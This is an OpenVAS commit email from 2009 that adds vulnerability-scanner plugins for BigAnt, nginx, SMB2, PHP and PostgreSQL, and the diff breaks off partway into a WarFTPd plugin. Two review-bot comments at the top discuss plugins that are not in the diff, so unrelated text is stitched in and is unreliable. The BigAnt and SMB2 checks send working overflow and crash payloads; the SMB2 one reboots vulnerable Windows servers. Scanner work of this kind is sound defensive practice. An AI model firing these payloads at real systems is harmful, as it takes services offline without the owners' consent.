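Review bot: security_warning(sshdPort); in the last block of secpod_freesshd_pre_auth_dos_vuln.nasl passes sshdPort, a variable that is never assigned anywhere in the script. The description block already declares script_require_ports("Services/ssh", 22), so read the port before the version comparison (for example from the "Services/ssh" KB entry, falling back to 22) and report on that value. The inline comment "Grep for freeSSHd version 1.2.4 and prior" is also misleading, since the code compares a KB value with version_is_less_equal rather than grepping anything.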
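Review bot: In secpod_ftpshell_client_detect.nasl the guard if(isnull(fclntPath)) comes after fclntPath = fclntPath - 'unins000.exe' + 'readme.txt';, so by the time it runs the concatenation has already produced a string and the guard cannot catch a missing UninstallString. Please test the value returned by registry_get_sz(key:key + item, item:"UninstallString") before the ereg_replace and the concatenation, and skip that registry entry when it is empty. A minor style point: script_version("$Revision: 1.0$") lacks the space before the closing "$" that the other new plugins have.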
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 1 Oct 2009 18:57:34 +0200 (CEST) Subject: [Openvas-commits] r5349 - in trunk/openvas-plugins: . scripts Message-ID: <20091001165734.70DD5852AD1D@pyrosoma.intevation.org> Author: mime Date: 2009-10-01 18:57:31 +0200 (Thu, 01 Oct 2009) New Revision: 5349 Added: trunk/openvas-plugins/scripts/BigAnt_36407.nasl trunk/openvas-plugins/scripts/BigAnt_detect.nasl trunk/openvas-plugins/scripts/ms_smb2_highid.nasl trunk/openvas-plugins/scripts/nginx_36384.nasl trunk/openvas-plugins/scripts/nginx_36438.nasl trunk/openvas-plugins/scripts/nginx_36490.nasl trunk/openvas-plugins/scripts/nginx_detect.nasl trunk/openvas-plugins/scripts/php_restriction_bypass.nasl trunk/openvas-plugins/scripts/postgreSQL_multiple_security_vulnerabilities.nasl trunk/openvas-plugins/scripts/warftpd_20944.nasl Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/cve_current.txt Log: Added new plugins Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-10-01 10:15:29 UTC (rev 5348) +++ trunk/openvas-plugins/ChangeLog 2009-10-01 16:57:31 UTC (rev 5349) @@ -1,3 +1,17 @@ +2009-10-01 Michael Meyer + + * scripts/BigAnt_36407.nasl, + scripts/warftpd_20944.nasl, + scripts/nginx_36384.nasl, + scripts/postgreSQL_multiple_security_vulnerabilities.nasl, + scripts/nginx_detect.nasl, + scripts/nginx_36438.nasl, + scripts/ms_smb2_highid.nasl, + scripts/BigAnt_detect.nasl, + scripts/php_restriction_bypass.nasl, + scripts/nginx_36490.nasl: + Added new plugins. + 2009-10-01 Chandrashekhar B * scripts/secpod_an_image_gallery_xss_vuln.nasl, Modified: trunk/openvas-plugins/cve_current.txt =================================================================== --- trunk/openvas-plugins/cve_current.txt 2009-10-01 10:15:29 UTC (rev 5348) +++ trunk/openvas-plugins/cve_current.txt 2009-10-01 16:57:31 UTC (rev 5349) 
@@ -88,4 +88,14 @@ CVE-2009-3473 SecPod CVE-2009-3472 SecPod CVE-2009-3478 SecPod - +36407 Greenbone svn R +CVE-2006-5789 Greenbone svn R +CVE-2009-2629 Greenbone svn R +CVE-2009-3229 Greenbone svn R +CVE-2009-3230 Greenbone svn R +CVE-2009-3231 Greenbone svn R +36438 Greenbone svn R +36555 Greenbone svn R +36554 Greenbone svn R +36490 Greenbone svn R +CVE-2009-3103 Greenbone svn R Added: trunk/openvas-plugins/scripts/BigAnt_36407.nasl =================================================================== --- trunk/openvas-plugins/scripts/BigAnt_36407.nasl 2009-10-01 10:15:29 UTC (rev 5348) +++ trunk/openvas-plugins/scripts/BigAnt_36407.nasl 2009-10-01 16:57:31 UTC (rev 5349) 
@@ -0,0 +1,96 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# BigAnt IM Server HTTP GET Request Buffer Overflow Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100278); + script_bugtraq_id(36407); + script_version ("1.0-$Revision$"); + + script_name("BigAnt IM Server HTTP GET Request Buffer Overflow Vulnerability"); + +desc = "Overview: +BigAnt IM Server is prone to a remote buffer-overflow vulnerability +because it fails to perform adequate boundary checks on user- +supplied input. + +An attacker can exploit this issue to execute arbitrary code with the +privileges of the user running the server. Failed exploit attempts +will result in a denial-of-service condition. + +BigAnt IM Server 2.50 is vulnerable; other versions may also be +affected. + +NOTE: This issue may be related to the vulnerability described in BID + 28795 (BigAnt IM Server HTTP GET Request Remote Buffer Overflow + Vulnerability). We will update or retire this BID if further + analysis or reports reveal that the two records represent the + same vulnerability. 
+ +Solution: +Updates are available. Please contact the vendor for details. + +References: +http://www.securityfocus.com/bid/36407 +http://www.bigantsoft.com + +Risk factor : High"; + + script_description(desc); + script_summary("Determine if BigAnt IM Server is prone to a remote buffer-overflow vulnerability"); + script_category(ACT_GATHER_INFO); + script_family("Buffer overflow"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("find_service.nes","BigAnt_detect.nasl"); + script_require_ports("Services/BigAnt", 6660); + exit(0); +} + +include("http_func.inc"); + +if(safe_checks())exit(0); + +#port = get_kb_item("Services/BigAnt"); +port = 6660; +if(!port)exit(0); +if(!get_port_state(port))exit(0); + +payload = crap(data:raw_string(0x41), length: 985); +payload += raw_string(0xeb,0x06,0x90,0x90,0x6a,0x19,0x9a,0x0f); +payload += crap(data:raw_string(0x90),length: 10); + +soc = open_sock_tcp(port); +if(!soc)exit(0); + +req = string("GET ", payload, "\r\n\r\n"); +send(socket:soc, data:req); +if(http_is_dead(port: port)) { + security_hole(port:port); + exit(0); +} + +exit(0); + Property changes on: trunk/openvas-plugins/scripts/BigAnt_36407.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/BigAnt_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/BigAnt_detect.nasl 2009-10-01 10:15:29 UTC (rev 5348) +++ trunk/openvas-plugins/scripts/BigAnt_detect.nasl 2009-10-01 16:57:31 UTC (rev 5349) 
@@ -0,0 +1,71 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# BigAnt IM Server Detection +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100280); + script_version ("1.0-$Revision$"); + + script_name("BigAnt IM Server Detection"); + + desc = "Overview: +This host is running BigAnt IM Server, a instant messaging solution +for enterprise. 
+ +See also: +http://www.bigantsoft.com/ + +Risk factor : None"; + + script_description(desc); + script_summary("Checks for the presence of BigAnt IM Server"); + script_category(ACT_GATHER_INFO); + script_family("Service detection"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("find_service.nes"); + exit(0); +} + +include("http_func.inc"); +include("global_settings.inc"); +include("misc_func.inc"); + +port = get_http_port(default:6660); +if(!get_port_state(port))exit(0); + +banner = get_http_banner(port: port); +if(!banner)exit(0); + +if(egrep(pattern:"AntServer", string:banner)) + { + register_service(port:port, ipproto:"tcp", proto:"BigAnt"); + if(report_verbosity > 0) { + security_note(port:port); + } + } + +exit(0); + Property changes on: trunk/openvas-plugins/scripts/BigAnt_detect.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/ms_smb2_highid.nasl =================================================================== --- trunk/openvas-plugins/scripts/ms_smb2_highid.nasl 2009-10-01 10:15:29 UTC (rev 5348) +++ trunk/openvas-plugins/scripts/ms_smb2_highid.nasl 2009-10-01 16:57:31 UTC (rev 5349) 
@@ -0,0 +1,121 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Microsoft Windows SMB2 '_Smb2ValidateProviderCallback()' Remote Code Execution Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100283); + script_bugtraq_id(36299); + script_cve_id("CVE-2009-3103"); + script_version ("1.0-$Revision$"); + + script_name("Microsoft Windows SMB2 '_Smb2ValidateProviderCallback()' Remote Code Execution Vulnerability"); + +desc = "Overview: +Microsoft Windows is prone to a remote code-execution vulnerability +when processing the protocol headers for the Server Message Block +(SMB) Negotiate Protocol Request. + +NOTE: Reportedly, for this issue to be exploitable, file sharing must + be enabled. + +An attacker can exploit this issue to execute code with SYSTEM-level +privileges; failed exploit attempts will likely cause denial-of- +service conditions. + +Windows 7 RC, Vista and 2008 Server are vulnerable; other versions may +also be affected. + +NOTE: Reportedly, Windows XP and 2000 are not affected. 
+ +UPDATE (September 9, 2009): Symantec has confirmed the issue on +Windows Vista SP1 and Windows Server 2008. + +i +References: +http://www.securityfocus.com/bid/36299 +http://blog.48bits.com/?p=510#more-510 +http://www.microsoft.com/technet/security/advisory/975497.mspx +http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx +http://www.microsoft.com/windows/windows-7/ +http://www.reversemode.com/index.php?option=com_content&task=view&id=64&Itemid=1 +http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx +http://www.microsoft.com/windows/products/windowsvista/default.mspx +http://g-laurent.blogspot.com/2009/09/windows-vista7-smb20-negotiate-protocol.html +http://www.securityfocus.com/archive/1/506300 +http://www.securityfocus.com/archive/1/506327 +http://www.kb.cert.org/vuls/id/135940 + +Risk factor : High"; + + script_description(desc); + script_summary("Determine if Microsoft Windows is prone to a remote code-execution vulnerability"); + script_category(ACT_GATHER_INFO); + script_family("Windows"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("find_service.nes", "smtpserver_detect.nasl"); + script_require_ports(445); + exit(0); +} + +include("misc_func.inc"); +include("network_func.inc"); + +if(safe_checks())exit(0); + +port = 445; +if(!get_port_state(port))exit(0); + +soc = open_sock_tcp(port); +if(!soc)exit(0); + +data = raw_string(0x00,0x00,0x00,0x90,0xff,0x53,0x4d,0x42,0x72,0x00,0x00,0x00,0x00,0x18,0x53,0xc8, + 0x00,0x26,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0xff,0xfe, + 0x00,0x00,0x00,0x00,0x00,0x6d,0x00,0x02,0x50,0x43,0x20,0x4e,0x45,0x54,0x57,0x4f, + 0x52,0x4b,0x20,0x50,0x52,0x4f,0x47,0x52,0x41,0x4d,0x20,0x31,0x2e,0x30,0x00,0x02, + 0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x31,0x2e,0x30,0x00,0x02,0x57,0x69,0x6e,0x64,0x6f, + 0x77,0x73,0x20,0x66,0x6f,0x72,0x20,0x57,0x6f,0x72,0x6b,0x67,0x72,0x6f,0x75,0x70, + 
0x73,0x20,0x33,0x2e,0x31,0x61,0x00,0x02,0x4c,0x4d,0x31,0x2e,0x32,0x58,0x30,0x30, + 0x32,0x00,0x02,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x32,0x2e,0x31,0x00,0x02,0x4e,0x54, + 0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00,0x02,0x53,0x4d,0x42,0x20,0x32,0x2e, + 0x30,0x30,0x32,0x00); # Tested against 2008 Server. A vulnerable Server doing a reboot. I'm not happy with that, but a the moment i have no idea how to detect this vulnerability without exploiting it. + +send(socket: soc, data: data); +close(soc); + +sleep(2); + +soc1 = open_sock_tcp(port); + + if(!soc1) { + security_hole(port:port); + exit(0); + } else { + close(soc1); + } + +exit(0); + + Property changes on: trunk/openvas-plugins/scripts/ms_smb2_highid.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/nginx_36384.nasl =================================================================== --- trunk/openvas-plugins/scripts/nginx_36384.nasl 2009-10-01 10:15:29 UTC (rev 5348) +++ trunk/openvas-plugins/scripts/nginx_36384.nasl 2009-10-01 16:57:31 UTC (rev 5349) 
@@ -0,0 +1,91 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# nginx HTTP Request Remote Buffer Overflow Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100276); + script_bugtraq_id(36384); + script_cve_id("CVE-2009-2629"); + script_version ("1.0-$Revision$"); + + script_name("nginx HTTP Request Remote Buffer Overflow Vulnerability"); + +desc = "Overview: +The 'nginx' program is prone to a buffer-overflow vulnerability +because the application fails to perform adequate boundary checks on +user-supplied data. + +Attackers can exploit this issue to execute arbitrary code within the +context of the affected application. Failed exploit attempts will +result in a denial-of-service condition. + +Solution: +Updates are available. Please see the references for more information. 
+ +References: +http://www.securityfocus.com/bid/36384 +http://nginx.net/CHANGES-0.5 +http://nginx.net/CHANGES-0.6 +http://nginx.net/CHANGES-0.7 +http://nginx.net/CHANGES +http://nginx.net/ +http://www.kb.cert.org/vuls/id/180065 + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if nginx is prone to a buffer-overflow vulnerability"); + script_category(ACT_GATHER_INFO); + script_family("Web Servers"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("nginx_detect.nasl"); + script_require_ports("Services/www", 80); + exit(0); +} + +include("http_func.inc"); +include("version_func.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); + +if(!vers = get_kb_item(string("nginx/", port, "/version")))exit(0); +if(!isnull(vers) && vers >!< "unknown") { + + if( + version_is_less(version: vers, test_version:"0.5.38") || + version_in_range(version:vers, test_version:"0.6", test_version2:"0.6.38") || + version_in_range(version:vers, test_version:"0.7", test_version2:"0.7.61") || + version_in_range(version:vers, test_version:"0.8", test_version2:"0.8.14") + ) { + + security_warning(port:port); + exit(0); + } + +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/nginx_36384.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/nginx_36438.nasl =================================================================== --- trunk/openvas-plugins/scripts/nginx_36438.nasl 2009-10-01 10:15:29 UTC (rev 5348) +++ trunk/openvas-plugins/scripts/nginx_36438.nasl 2009-10-01 16:57:31 UTC (rev 5349) 
@@ -0,0 +1,87 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# nginx Proxy DNS Cache Domain Spoofing Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100277); + script_bugtraq_id(36438); + script_version ("1.0-$Revision$"); + + script_name("nginx Proxy DNS Cache Domain Spoofing Vulnerability"); + +desc = "Overview: +The 'nginx' program is prone to a vulnerability that may allow +attackers to spoof domains because the software fails to properly +compare domains when referencing an internal DNS cache. + +This issue can be exploited when nginx is configured to act as a +forward proxy, but this is a nonstandard and unsupported +configuration. Attacks against other configurations may also be +possible. + +Successful exploits may allow remote attackers to intercept traffic +intended for legitimate websites, which may aid in further attacks. 
+ +References: +http://www.securityfocus.com/bid/36438 +http://nginx.net/ +http://www.securityfocus.com/archive/1/506541 +http://www.securityfocus.com/archive/1/506543 + +Risk factor : Low"; + + script_description(desc); + script_summary("Determine if nginx is prone to a Proxy DNS Cache Domain Spoofing Vulnerability"); + script_category(ACT_GATHER_INFO); + script_family("Web Servers"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("nginx_detect.nasl"); + script_require_ports("Services/www", 80); + exit(0); +} + +include("http_func.inc"); +include("version_func.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); + +if(!vers = get_kb_item(string("nginx/", port, "/version")))exit(0); +if(!isnull(vers) && vers >!< "unknown") { + + if( + version_in_range(version:vers, test_version:"0.8", test_version2:"0.8.15") || + version_in_range(version:vers, test_version:"0.7", test_version2:"0.7.62") || + version_in_range(version:vers, test_version:"0.6", test_version2:"0.6.39") || + version_in_range(version:vers, test_version:"0.5", test_version2:"0.5.38") + ) { + security_warning(port:port); + exit(0); + } + +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/nginx_36438.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/nginx_36490.nasl =================================================================== --- trunk/openvas-plugins/scripts/nginx_36490.nasl 2009-10-01 10:15:29 UTC (rev 5348) +++ trunk/openvas-plugins/scripts/nginx_36490.nasl 2009-10-01 16:57:31 UTC (rev 5349) 
@@ -0,0 +1,85 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# nginx WebDAV Multiple Directory Traversal Vulnerabilities +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100275); + script_bugtraq_id(36490); + script_version ("1.0-$Revision$"); + + script_name("nginx WebDAV Multiple Directory Traversal Vulnerabilities"); + +desc = "Overview: +The 'nginx' program is prone to multiple directory-traversal +vulnerabilities because the software fails to sufficiently sanitize +user-supplied input. + +An attacker can exploit these issues using directory-traversal strings +('../') to overwrite arbitrary files outside the root directory. + +These issues affect nginx 0.7.61 and 0.7.62; other versions may also +be affected. 
+ +References: +http://www.securityfocus.com/bid/36490 +http://nginx.net/ +http://www.securityfocus.com/archive/1/506662 + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if nginx Version is 0.7.61 ot 0.7.62"); + script_category(ACT_GATHER_INFO); + script_family("Web Servers"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("nginx_detect.nasl"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); +include("http_keepalive.inc"); +include("version_func.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); + +if(!vers = get_kb_item(string("nginx/", port, "/version")))exit(0); +if(!isnull(vers) && vers >!< "unknown") { + + if( + version_is_equal(version: vers, test_version: "0.7.61") || + version_is_equal(version: vers, test_version: "0.7.62") + ) { + security_warning(port:port); + exit(0); + } + +} + +exit(0); + Property changes on: trunk/openvas-plugins/scripts/nginx_36490.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/nginx_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/nginx_detect.nasl 2009-10-01 10:15:29 UTC (rev 5348) +++ trunk/openvas-plugins/scripts/nginx_detect.nasl 2009-10-01 16:57:31 UTC (rev 5349) 
@@ -0,0 +1,91 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# nginx Detection +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +# need desc here to modify it later in script. +desc = "Overview: +This host is running nginx. nginx [engine x] is a HTTP server and mail +proxy server written by Igor Sysoev. 
+ +See also: +http://nginx.net/ + +Risk factor : None"; + +if (description) +{ + script_id(100274); + script_version ("1.0-$Revision$"); + script_name("nginx Detection"); + script_description(desc); + script_summary("Checks for the presence of nginx"); + script_category(ACT_GATHER_INFO); + script_family("Service detection"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("find_service.nes", "http_version.nasl"); + script_require_ports("Services/www", 80); + exit(0); +} + +include("http_func.inc"); +include("global_settings.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); + + buf = get_http_banner(port: port); + if(!buf)exit(0); + + if(egrep(pattern:"Server: nginx/" , string: buf, icase: TRUE)) + { + vers = string("unknown"); + ### try to get version + version = eregmatch(string: buf, pattern: "Server: nginx/([0-9.]+)",icase:TRUE); + + if ( !isnull(version[1]) ) { + vers=chomp(version[1]); + } + + set_kb_item(name: string("nginx/", port, "/version"), value: string(vers)); + + info = string("None\n\nnginx Version '"); + info += string(vers); + info += string("' was detected on the remote host."); + + desc = ereg_replace( + string:desc, + pattern:"None$", + replace:info + ); + + if(report_verbosity > 0) { + security_note(port:port,data:desc); + } + exit(0); + + } + +exit(0); + Property changes on: trunk/openvas-plugins/scripts/nginx_detect.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/php_restriction_bypass.nasl =================================================================== --- trunk/openvas-plugins/scripts/php_restriction_bypass.nasl 2009-10-01 10:15:29 UTC (rev 5348) +++ trunk/openvas-plugins/scripts/php_restriction_bypass.nasl 2009-10-01 16:57:31 UTC (rev 5349) 
@@ -0,0 +1,94 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# PHP multiple Restriction-Bypass Vulnerabilities +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100281); + script_bugtraq_id(36555,36554); + script_version ("1.0-$Revision$"); + + script_name("PHP multiple Restriction-Bypass Vulnerabilities"); + +desc = "Overview: +PHP is prone to a 'safe_mode' and to a 'open_basedir' +restriction-bypass vulnerability. Successful exploits could allow an +attacker to access files in unauthorized locations or create files in +any writable directory and in unauthorized locations. + +This vulnerability would be an issue in shared-hosting configurations +where multiple users can create and execute arbitrary PHP script code; +the 'safe_mode' and the 'open_basedir' restrictions are assumed to +isolate users from each other. + +PHP 5.2.11 and 5.3.0 are vulnerable; other versions may also be +affected. + +Solution: +Updates are available. Please see the references for details. 
+ +References: +http://www.securityfocus.com/bid/36555 +http://www.securityfocus.com/bid/36554 +http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/ext/standard/file.c?view=log +http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/standard/file.c?view=log +http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/ext/posix/posix.c?view=log +http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/posix/posix.c?view=log +http://securityreason.com/securityalert/6601 +http://securityreason.com/securityalert/6600 +http://www.php.net + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if php version is 5.3.0 or 5.2.11"); + script_category(ACT_GATHER_INFO); + script_family("Web application abuses"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("gb_php_detect.nasl"); + script_require_ports("Services/www", 80); + exit(0); +} + +include("version_func.inc"); + +phpPort = get_kb_item("Services/www"); +if(!phpPort){ + exit(0); +} + +phpVer = get_kb_item("www/" + phpPort + "/PHP"); +if(!phpVer){ + exit(0); +} + +if(version_is_equal(version:phpVer, test_version:"5.2.11") || + version_is_equal(version:phpVer, test_version:"5.3.0")) { + + security_warning(port:phpPort); + exit(0); +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/php_restriction_bypass.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/postgreSQL_multiple_security_vulnerabilities.nasl =================================================================== --- trunk/openvas-plugins/scripts/postgreSQL_multiple_security_vulnerabilities.nasl 2009-10-01 10:15:29 UTC (rev 5348) +++ trunk/openvas-plugins/scripts/postgreSQL_multiple_security_vulnerabilities.nasl 2009-10-01 16:57:31 UTC (rev 5349) 
@@ -0,0 +1,93 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# PostgreSQL Multiple Security Vulnerabilities +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100273); + script_bugtraq_id(36314); + script_cve_id("CVE-2009-3229","CVE-2009-3230","CVE-2009-3231"); + script_version ("1.0-$Revision$"); + + script_name("PostgreSQL Multiple Security Vulnerabilities"); + +desc = "Overview: +PostgreSQL is prone to multiple security vulnerabilities, including a +denial-of-service issue, a privilege-escalation issue, and an authentication- +bypass issue. + +Attackers can exploit these issues to shut down affected servers, +perform certain actions with elevated privileges, and bypass +authentication mechanisms to perform unauthorized actions. Other +attacks may also be possible. + + +Solution: +Updates are available. Please see the references for more information. 
+ + +References: +http://www.securityfocus.com/bid/36314 +https://bugzilla.redhat.com/show_bug.cgi?id=522085#c1 +http://www.postgresql.org/ +http://www.postgresql.org/support/security +http://permalink.gmane.org/gmane.comp.security.oss.general/2088 + + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if PostgreSQL is prone to multiple security vulnerabilities"); + script_category(ACT_GATHER_INFO); + script_family("Databases"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("postgresql_detect.nasl"); + script_require_ports("Services/postgresql", 5432); + exit(0); +} + +include("misc_func.inc"); +include("version_func.inc"); + +port = get_kb_item("Services/postgresql"); +if(!port)port = 5432; +if(!get_tcp_port_state(port))exit(0); + +if(!ver = get_kb_list(string("PostgreSQL/Remote/", port, "/Ver")))exit(0); + +if( + version_in_range(version:ver, test_version:"8.4", test_version2:"8.4.0") || + version_in_range(version:ver, test_version:"8.3", test_version2:"8.3.7") || + version_in_range(version:ver, test_version:"8.2", test_version2:"8.2.13") || + version_in_range(version:ver, test_version:"8.1", test_version2:"8.1.17") || + version_in_range(version:ver, test_version:"8.0", test_version2:"8.0.21") || + version_in_range(version:ver, test_version:"7.4", test_version2:"7.4.25") + ) +{ + security_warning(port:port); + exit(0); +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/postgreSQL_multiple_security_vulnerabilities.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/warftpd_20944.nasl =================================================================== --- trunk/openvas-plugins/scripts/warftpd_20944.nasl 2009-10-01 10:15:29 UTC (rev 5348) +++ trunk/openvas-plugins/scripts/warftpd_20944.nasl 2009-10-01 